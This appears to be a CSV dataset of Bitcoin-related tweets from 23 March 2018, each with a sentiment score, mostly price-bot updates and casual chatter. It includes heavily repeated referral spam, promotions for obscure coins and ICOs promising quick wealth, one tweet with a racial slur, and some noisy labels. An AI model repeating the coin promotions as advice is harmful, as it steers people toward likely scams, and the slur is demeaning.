#BitcoinPrice",0.0 +Fri Mar 23 05:00:00 +0000 2018,"This just in: Bitcoin is rising! +Current Rate: 8419.37 USD = 1 BTC",0.0 +Fri Mar 23 05:00:00 +0000 2018,"Mar 22, 2018 10:00PM #Bitcoin Price: +USD 8657.47 | EUR 7029.56 | JPY 921267.14",0.0 +Fri Mar 23 05:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,460.33, market cap of $143,271,559,909 (44.33%), and 24 hr vol. 
of $5,515,150,000 (37.68%)",0.0 +Fri Mar 23 05:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,460.33 +Change in 1h: +0.14% +Market cap: $143,271,559,909.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 05:00:01 +0000 2018,"Bitcoin:$8460.33 +Ethereum:$520.325 +Bitcoin Cash:$973.61 +Litecoin:$159.12 +Ripple:$0.637725 +IOTA:$1.27707",0.0 +Fri Mar 23 05:00:02 +0000 2018,Current BTC Dominance: 44.29% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 05:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,419.37, EUR 6,824.96",-1.0 +Fri Mar 23 05:00:03 +0000 2018,"1 bitcoin = $8451.41 / 6859.586€ +1 bitcoin-cash = $972.688 / 789.482€ +1 ethereum = $518.784 / 421.071€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:00:07 +0000 2018,Women don't want a nigga buying them flowers anymore. They want shit like bitcoin or just give them money.,-1.0 +Fri Mar 23 05:00:03 +0000 2018,"1 bitcoin = $8451.41 / 6859.586€ +1 bitcoin-cash = $972.688 / 789.482€ +1 ethereum = $518.784 / 421.071€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:00:10 +0000 2018,"#Bitcoin 24Hour High/Low: +High: $9,402.26 +Low: $8,878.77",1.0 +Fri Mar 23 05:00:11 +0000 2018,"You can't kill Bitcoin + +-@APompliano",0.0 +Fri Mar 23 05:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8411.04/$8418.50 #Bitstamp +$8402.15/$8412.18 #Kraken +⇢$-16.35/$1.14 +$8369.99/$8455.38 #Coinbase +⇢$-48.51/$44.34",0.0 +Fri Mar 23 05:00:14 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$29.4M; Support til $8200:$38.7M $BTC $BTCUSD #bitcoin #orderbook #crypto #finance,1.0 +Fri Mar 23 05:00:16 +0000 2018,Current price of Bitcoin is $8412.05 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 05:00:27 +0000 2018,#EOS Price is 0.00078324 (-0.00000828) #BTC / 6.59819 (-0.08889) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:28 +0000 2018,#SUB Price is 0.00004597 (-0.00000026) #BTC / 0.386025 (-0.00444) #USD. 
Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:30 +0000 2018,#DASH Price is 0.0476288 (-0.00053370) #BTC / 399.923 (-6.97400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:30 +0000 2018,"BTC hourly update +$8430.99 | +0.0015%📈 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 05:00:31 +0000 2018,#ADA Price is 0.00002272 (-0.00000007) #BTC / 0.190783 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:32 +0000 2018,#XEM Price is 0.00003306 (-0.00000018) #BTC / 0.277553 (-0.00318) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:32 +0000 2018,Sshhh dont tell anyone but #Bitcoin is $8412.05 right now. Ok back to sleep zzzzz,1.0 +Fri Mar 23 05:00:38 +0000 2018,@DavidDagan @CherylPreheim @deray @11AliveNews No! The incredibly specific amount of $51k in bitcoin please and thank you.,0.0 +Fri Mar 23 05:00:53 +0000 2018,"#Bitcoin $8,417.21 v #BitcoinCash $971.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 14:00JST",0.0 +Fri Mar 23 05:01:25 +0000 2018,📣 Bitcoin is $8412.06 $BTC,0.0 +Fri Mar 23 05:01:27 +0000 2018,8412.06$ for #bitcoin now,0.0 +Fri Mar 23 05:01:28 +0000 2018,"@zebpay Next Bitcoin is The Champcoin (TCC) +India's First & No1 CryptoCurrency...",1.0 +Fri Mar 23 05:01:28 +0000 2018,Bitcoin 8412.06 $,0.0 +Fri Mar 23 05:01:38 +0000 2018,Current price of #Bitcoin is $8412.06,0.0 +Fri Mar 23 05:01:44 +0000 2018,@mindstatex @SheriUcar #Bitcoin(BCH) is the KING of the Crypto Currencies.,0.0 +Fri Mar 23 05:01:50 +0000 2018,#Bitcoin Price 8412.06 USD via Chain,0.0 +Fri Mar 23 05:01:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:01:55 +0000 2018,@allcharmngrace @clairlemon @MarkYusko @iammarkcarnegie How do you short bitcoin?,0.0 +Fri Mar 23 05:02:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:02:54 +0000 2018,Current price of Bitcoin is $8412.06.,0.0 +Fri Mar 23 05:02:55 +0000 2018,Current price of Bitcoin is $8412.06 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 05:03:27 +0000 2018,Current price of Bitcoin is $8412.06,0.0 +Fri Mar 23 05:03:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:04:44 +0000 2018,@AlanMCole Bitcoin is still in the early adopter phase,1.0 +Fri Mar 23 05:04:51 +0000 2018,@yahaya_aminu Ditcoin is very good currency I love ditcoin my future Bitcoin my dream ditcoin,1.0 +Fri Mar 23 05:04:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:05:05 +0000 2018,@Bitcoin This is a bcash promote account. Attention.,0.0 +Fri Mar 23 05:05:42 +0000 2018,@bethereumteam Betherum coin is very good coin and next bitcoin.,1.0 +Fri Mar 23 05:05:47 +0000 2018,"@CNBC Bitcoin, the money of the New World Order!!",1.0 +Fri Mar 23 05:06:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:07:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:08:14 +0000 2018,"It's your boy, Ms. slayer that loves talking about Bitcoin",0.0 +Fri Mar 23 05:09:00 +0000 2018,"Can someone tell me exactly why Bitcoin Gold is valued @ $60, does anyone use this for anything?",1.0 +Fri Mar 23 05:09:16 +0000 2018,BTC $8460.33 Up +$16.22 +0.19% in the last hour #bitcoin #bitsmart,0.0 +Fri Mar 23 05:09:25 +0000 2018,"@pierre_rochard centralized currencies, digital or not are printed by the government, Bitcoin isn't.",0.0 +Fri Mar 23 05:09:31 +0000 2018,@MashaT22 @coinbase @Bitcoin I’m trying to find out about Bitcoin. 
Can you offer information,0.0 +Fri Mar 23 05:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.451,410 +1 Hour: - | 24 Hours: -6.58 % | 7 Days: 2.98 % +#btc #bitcoin",0.0 +Fri Mar 23 05:10:03 +0000 2018,"1 bitcoin = $8436.79 / 6847.72€ +1 bitcoin-cash = $970.839 / 787.981€ +1 ethereum = $516.277 / 419.036€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:10:05 +0000 2018,@_Kevin_Pham What if #bitcoin is #fightclub and #Satoshi is tyler durden and craig is Edward Norton,0.0 +Fri Mar 23 05:11:11 +0000 2018,"@Cylinders_io Great project, impressive level! +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 05:11:11 +0000 2018,@zebpay TCC (the champcoin) is best crypto currency i love #tcc #bitcoin #BTC #xrp,1.0 +Fri Mar 23 05:11:21 +0000 2018,"฿ value over 3 months: --40.63%, ($-5757.95) [Currently $8412.055] #bitcoin",0.0 +Fri Mar 23 05:11:26 +0000 2018,Bitcoin value: $8420.94,0.0 +Fri Mar 23 05:11:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:11:54 +0000 2018,@emiliakraft My last sugar baby invested my sugar into bitcoin lmao,1.0 +Fri Mar 23 05:12:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:12:49 +0000 2018,@stephanlivera @pierre_rochard Unix Philosophy is timeless. Bitcoin and *nix are like milk and cookies.,0.0 +Fri Mar 23 05:12:55 +0000 2018,"""You have to be willing to accept some risk in your Bitcoin transactions in order to scale it globally."" - @VinnyLingham @Satoshis_Vision",1.0 +Fri Mar 23 05:12:56 +0000 2018,@JohnLoveTheKing Facts and bitcoin LoL,1.0 +Fri Mar 23 05:13:05 +0000 2018,I just won free 15 satoshi from WeLoveBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:13:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:14:12 +0000 2018,@zerohedge China bitcoin and pedophilia seem to be competing for first to kill the dollar.,1.0 +Fri Mar 23 05:14:13 +0000 2018,"@PhilakoneCrypto in deleted video you say ""always assume parallel with bitcoin"" why and what's the significance?",0.0 +Fri Mar 23 05:14:22 +0000 2018,"@twobitidiot I like the idea, but what country uses Bitcoin as a reserve currency?",0.0 +Fri Mar 23 05:14:41 +0000 2018,"Current Bitcoin Price = $9423.79 --- Includes Sum of Forks, Core $8399.00 (89.13%) + Cash $967.36 (10.27%) + Gold $57.43 (0.61%)",0.0 +Fri Mar 23 05:14:47 +0000 2018,"""Bitcoin Core is starting to look somewhat like a pyramid scheme."" - @ryanxcharles",0.0 +Fri Mar 23 05:15:02 +0000 2018,"The current price of Bitcoin is $8436.79. +The current price of BCash is $970.839, or 0.115725 BTC",0.0 +Fri Mar 23 05:15:12 +0000 2018,@RealMattCouch Do you accept bitcoin...serious question,0.0 +Fri Mar 23 05:15:21 +0000 2018,Whoever invests heavy this year in crypto( into the right coins) is going to be rich as fuck next year. #crypto #bitcoin #zec #bat $xmr $ltc,1.0 +Fri Mar 23 05:15:23 +0000 2018,"@SKYFchain +Register now before its too late, avail the 30% off +#skyfchain #Crowdsale #Bitcoin #Blockchain",-1.0 +Fri Mar 23 05:15:33 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:15:34 +0000 2018,@vianry Bitcoin?,0.0 +Fri Mar 23 05:15:40 +0000 2018,"@yahaya_aminu Good currency ditcoin Bitcoin is 1 year $1,000 crores now live rate $3 invest now ditcoin better future",1.0 +Fri Mar 23 05:15:53 +0000 2018,@USATODAY Fortunately we’ve got Bitcoin,1.0 +Fri Mar 23 05:15:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:16:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:16:07 +0000 2018,Current price of Bitcoin is $8418.82 #Bitcoin #Bithound,0.0 +Fri Mar 23 05:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$970,839 +1 Hour: -0.34 % | 24 Hours: -7.55 % | 7 Days: 5.32 % +#bch #bitcoin cash",0.0 +Fri Mar 23 05:17:22 +0000 2018,"""You can't steal the Bitcoin brand. It's a permissionless world."" @VinnyLingham",0.0 +Fri Mar 23 05:18:11 +0000 2018,Coinbase Is In Talks to Buy One of Bitcoin's Best Funded Startups - CoinDesk -,1.0 +Fri Mar 23 05:18:54 +0000 2018,"Bitcoin is dead, crypto tweeter are fake and you are all going to be rekt. Enjoy !",-1.0 +Fri Mar 23 05:18:55 +0000 2018,"#Bitcoin #VisionOfSatoshi conference “while I don’t know what the right block size is, capping it @ 1mb is silly” @VinnyLingham",-1.0 +Fri Mar 23 05:19:27 +0000 2018,"@Bitcoin Good luck 👍. +Lot of investesrs are thinking Bit will go to 2000$ for sure end of December .can any one can advise the thoughts ?",1.0 +Fri Mar 23 05:19:55 +0000 2018,"mEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:19:56 +0000 2018,At @BrisbaneAirport - no one accepts Bitcoin. #FakeNews,0.0 +Fri Mar 23 05:20:03 +0000 2018,"1 bitcoin = $8435.82 / 6846.933€ +1 bitcoin-cash = $971.063 / 788.163€ +1 ethereum = $516.793 / 419.455€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:20:12 +0000 2018,"$BTC 💵 price: $8435.82 1.00000BTC +1h: -0.44% 🔻 +1d: -6.73% 🔻 +7d: +2.83% 📈 +👾 #Bitcoin 24h volume: $5,511,710,000",0.0 +Fri Mar 23 05:20:25 +0000 2018,BB-8 is a bitcoin farmer,0.0 +Fri Mar 23 05:20:45 +0000 2018,M0mchil's external bitcoin miner idea has solved a lot of housekeeping data required. It will keep nagging the CPU!,0.0 +Fri Mar 23 05:22:36 +0000 2018,"any1 knows anything about bitcoin?,i receive emails from them daily asking me 2 join",0.0 +Fri Mar 23 05:22:46 +0000 2018,@d_crypto0 @Yorkyor30444439 @TheCryptoDog I mean... 6 million bitcoin... 
lmao don’t worry I know that’s fake af,-1.0 +Fri Mar 23 05:22:47 +0000 2018,"If you let me order coffee after dinner you’re fired. + +#bitcoin",0.0 +Fri Mar 23 05:23:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:23:49 +0000 2018,@zebpay Tcc ( the champ coin) time ka bitcoin hoga,0.0 +Fri Mar 23 05:23:54 +0000 2018,#cryptocurrencies #crypto #bitcoin No trades today just HODL for Correction,0.0 +Fri Mar 23 05:24:16 +0000 2018,"The current value of BTC at 15:24:07 on 23/03/2018 (AEST) is $10,870.00 AUD. +#bitcoin #australia",0.0 +Fri Mar 23 05:24:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:24:56 +0000 2018,@SanjayP33580371 I support bitcoin and regulate it.,0.0 +Fri Mar 23 05:25:04 +0000 2018,"@nikzh @vermorel The one who bet against technology usually is a loser. :) + +#bitcoicash is #bitcoin and will scale to the world",1.0 +Fri Mar 23 05:25:30 +0000 2018,Lol just got offered a scam job from a “bitcoin” company. Come on lads try harder,1.0 +Fri Mar 23 05:25:36 +0000 2018,"Fri Mar 23 06:25:21 2018 (28:56) +USD : 8379.34 +Wght: 0.42 +Blk#: 514765 +Size: 1090.2 KB +TXs: 2420 +Pool: 330 (0.5 MB) +#bitcoin",0.0 +Fri Mar 23 05:25:43 +0000 2018,“There is a lot of headroom to go!” -@VinnyLingham on Bitcoin Cash. “Will get a lot of traction in the payment space.”,0.0 +Fri Mar 23 05:25:48 +0000 2018,My PayPal and my bitcoin wallet are both jumpin like Jordan let’s keep this shit stackin,-1.0 +Fri Mar 23 05:26:28 +0000 2018,Our #bitcoin atm at #Chinatown is now back online. Do drop by and feel free to come in to say hi. 
#bitcoinsingapore,1.0 +Fri Mar 23 05:26:30 +0000 2018,"@liluzifresh26 Sure they can, for example, I am Positive Bitcoin will end it's Negative spiral downwards.",1.0 +Fri Mar 23 05:26:33 +0000 2018,@Cryptopia_NZ @ColossusCoinXT Please add Bitcoin Privat...,0.0 +Fri Mar 23 05:26:37 +0000 2018,New #bitcoin block 00000000000000000038933efa99946d8e7e25e8c5340a25782d0e3663232353 mined at height 514765.,1.0 +Fri Mar 23 05:26:43 +0000 2018,"paperapapera1973@gmail.com Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:26:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:27:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:27:37 +0000 2018,"1e1015d2f6bd97e430f5a44e44d315f895ff06e1844ed426707a7c36a082be94/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 05:28:18 +0000 2018,I just won free 20 satoshi from GalaxyBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:28:26 +0000 2018,I just won free 10 satoshi from PlayBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 05:28:30 +0000 2018,Unbanked around the world — #UnbankedX system will help them all effortlessly #ICO #DOCHECKITOUT #BITCOIN #BLOCKCHAIN,0.0 +Fri Mar 23 05:28:33 +0000 2018,@cz_binance Please add Bitcoin Privat...,0.0 +Fri Mar 23 05:28:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:29:11 +0000 2018,Tomorrow would be a great day for Bitcoin to tank.,1.0 +Fri Mar 23 05:29:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:29:40 +0000 2018,"#Bitcoin price failed to break past the $9,000 level after news of a potential shutdown of #Binance in Japan broke out.",-1.0 +Fri Mar 23 05:29:51 +0000 2018,@brs_ogz Buy bitcoin,0.0 +Fri Mar 23 05:30:02 +0000 2018,"Bitcoin:$8423.74 +Ethereum:$516.024 +Bitcoin Cash:$969.07 +Litecoin:$158.534 +Ripple:$0.632696 +IOTA:$1.27537",0.0 +Fri Mar 23 05:30:02 +0000 2018,"1 bitcoin = $8422.59 / 6836.195€ +1 bitcoin-cash = $969.07 / 786.545€ +1 ethereum = $515.719 / 418.583€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:30:04 +0000 2018,One Bitcoin now worth $8381.97@bitstamp. High $9046.180. Low $8342.000. Market Cap $141.942 Billion #bitcoin,1.0 +Fri Mar 23 05:30:06 +0000 2018,"Eventually, banks will welcome Bitcoin, just like telcos found a way to make a dime on the Internet.",1.0 +Fri Mar 23 05:30:25 +0000 2018,#ADA Price is 0.00002252 (-0.00000020) #BTC / 0.189038 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:26 +0000 2018,#EOS Price is 0.00077749 (-0.00000575) #BTC / 6.52578 (-0.07241) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:27 +0000 2018,#SUB Price is 0.00004583 (-0.00000014) #BTC / 0.384062 (-0.00196) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:29 +0000 2018,#XEM Price is 0.00003290 (-0.00000016) #BTC / 0.275727 (-0.00183) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:29 +0000 2018,#DASH Price is 0.0474443 (-0.00018450) #BTC / 397.633 (-2.29000) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 05:30:54 +0000 2018,@cz_binance CZ can you please add BItcoin Private. 
It adds exatly THE feutures that are missing in Bitcoin,-1.0 +Fri Mar 23 05:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8422.59 as of Fri Mar 23 00:31:09 CDT 2018",0.0 +Fri Mar 23 05:31:22 +0000 2018,@yahaya_aminu Very very exclusive currency the ditcoin future Bitcoin very soon now buy ditcoin $3,1.0 +Fri Mar 23 05:31:27 +0000 2018,Bitcoin value: $8396.8,0.0 +Fri Mar 23 05:31:48 +0000 2018,"""The idea that Bitcoin Cash doesn't have competent developers is a BS narrative."" - @VinnyLingham at @Satoshis_Vision",1.0 +Fri Mar 23 05:32:18 +0000 2018,"@CrypConsigliere So non-volatile but will outperform Bitcoin, where will the returns come from if there's no risk?",0.0 +Fri Mar 23 05:32:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:33:08 +0000 2018,@CollectiveEvol Bitcoin.,0.0 +Fri Mar 23 05:33:11 +0000 2018,Current price of Bitcoin is $8412.06 #Bitcoin #Bithound,0.0 +Fri Mar 23 05:33:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:34:10 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:34:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:08 +0000 2018,",Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:35:39 +0000 2018,@jakeseelye @Socal_crypto It's about that time. Time to decide whether to place that 3rd bid or sleep on it. 
Just another day in bitcoin.,0.0 +Fri Mar 23 05:36:06 +0000 2018,@lucx946 @Castle_CSTL @bitcoinprivate There is CSTL in Bitcoin private logo. And then there are Castle like design on the btcp logo.,0.0 +Fri Mar 23 05:36:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:37:04 +0000 2018,Thanks @ryanxcharles & @VinnyLingham for your insights on both sides of the #Bitcoin debate @Satoshis_Vision 🌏✌️🤙,1.0 +Fri Mar 23 05:37:08 +0000 2018,@zebpay THE CHAMPCOIN HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY,0.0 +Fri Mar 23 05:37:10 +0000 2018,@Free_Ross And the beginning stages of their plan to defeat bitcoin!,0.0 +Fri Mar 23 05:38:12 +0000 2018,Assuming Bitcoin needs use cases to become ' a thing' is silly. It just needs enough rich people and banks to think it's good for them.,1.0 +Fri Mar 23 05:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:39:18 +0000 2018,@cryptostardust @afrobeng is bitcoin an ERC20 token sir? 😂 😂 😂,0.0 +Fri Mar 23 05:39:30 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Someone may do it, so please send it  +#Bitcoin #VirtualCurrency",0.0 +Fri Mar 23 05:40:02 +0000 2018,"1 bitcoin = $8421.7 / 6835.472€ +1 bitcoin-cash = $969.943 / 787.254€ +1 ethereum = $515.703 / 418.57€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:40:04 +0000 2018,EWangBiCoin ( $EWC ) will be listed on CoinExchange #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews,0.0 +Fri Mar 23 05:40:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:40:32 +0000 2018,"""Lost coins only make everyone else's coins worth slightly more. Think of it as a donation to everyone."" - Satoshi Nakamoto #bitcoin #quote",1.0 +Fri Mar 23 05:41:30 +0000 2018,".Earn bitcoin on a daily basis! 
+ +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:41:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:41:42 +0000 2018,@creepy_von_evil ...I take payment in cash or bitcoin.,0.0 +Fri Mar 23 05:41:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:42:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin good +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:42:28 +0000 2018,We need Bitcoin to stay over $8300. Im already starting to see the vacuum on alts that have risen over this last week.,-1.0 +Fri Mar 23 05:42:43 +0000 2018,@zmanbrianzane You're investing in Bitcoin?,0.0 +Fri Mar 23 05:42:45 +0000 2018,"So fucking sick of this market. + +#cryptocurrency #crypto #BTC #bitcoin",-1.0 +Fri Mar 23 05:43:31 +0000 2018,@youre_the_goat I’d have pulled out of bitcoin earlier,0.0 +Fri Mar 23 05:43:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:43:55 +0000 2018,@FlyGuyInTheSky Bitcoin Stinks,-1.0 +Fri Mar 23 05:43:57 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:44:14 +0000 2018,@zebpay TCC is Next BITCOIN of India.... The Champcoin is best cryptocruncy,1.0 +Fri Mar 23 05:44:23 +0000 2018,"0,00001293 Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:44:33 +0000 2018,@AandGShow PLEASE!!! Can we just talk about bitcoin or something...pleeeaaassse?,0.0 +Fri Mar 23 05:44:36 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8389 / €6801 / £5943 @ Block 514765. +Market Cap: 143.22B USD. #Bitcoin #Market",0.0 +Fri Mar 23 05:46:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:46:13 +0000 2018,@pierre_rochard what can you buy with bitcoin?,0.0 +Fri Mar 23 05:47:56 +0000 2018,"@rogerkver @Falkvinge Rick Falkvinge is the man. Watched him on YouTube, next day bought Bitcoin Cash.",0.0 +Fri Mar 23 05:48:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:49:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:50:02 +0000 2018,"BTC-STEEM AskRate: 0.00024274 #Bittrex #STEEM $STEEM #STEEM #altcoin #altcoins #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 05:50:03 +0000 2018,"1 bitcoin = $8440.42 / 6850.666€ +1 bitcoin-cash = $970.377 / 787.606€ +1 ethereum = $518.991 / 421.239€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:50:03 +0000 2018,"Lottery in Bitcoin! ? +Prize money and can be purchased from all over the world in the Bitcoin that can be received in any country ! ! +bitcoi",0.0 +Fri Mar 23 05:51:28 +0000 2018,Bitcoin value: $8398.47,0.0 +Fri Mar 23 05:51:36 +0000 2018,@sprenten @jucoplayerinfo Oh hi. Ok. Ill send you bitcoin.,-1.0 +Fri Mar 23 05:51:53 +0000 2018,"BITCOIN FACTS: On the first 5 years of #Bitcoin existence, it grew from $0 to $1,000",1.0 +Fri Mar 23 05:53:09 +0000 2018,@CarpeNoctom and I dont even know if that guy knows what bitcoin is,0.0 +Fri Mar 23 05:54:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:54:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:54:25 +0000 2018,#Bitcoin could entirely change the way our means of exchange works #bitcoinsfuture #bitcoin #btc #bitcoinsfuture,0.0 +Fri Mar 23 05:54:45 +0000 2018,@zebpay Tcc is the king of cryptocurrency..... 
And next Bitcoin from India,0.0 +Fri Mar 23 05:55:32 +0000 2018,@IAndrewIvers Don’t buy bitcoin,0.0 +Fri Mar 23 05:56:12 +0000 2018,"@NickSzabo4 👏👏 +Bitcoin is proof of that statement...",0.0 +Fri Mar 23 05:56:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:56:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet +3. use ABI648 as ref",1.0 +Fri Mar 23 05:56:44 +0000 2018,"@cryptomanran Agreed, there are plenty of other exchanges Japanese can buy bitcoin.",-1.0 +Fri Mar 23 05:56:45 +0000 2018,"@MarkYusko So... what say you , Buy Bitcoin now or wait a little longer?",-1.0 +Fri Mar 23 05:57:21 +0000 2018,How/when/where to invest in bitcoin and altcoins.,0.0 +Fri Mar 23 05:57:50 +0000 2018,"i think bitcoin ... may be significant perversely precisely because it takes a lot of time to mine, or to 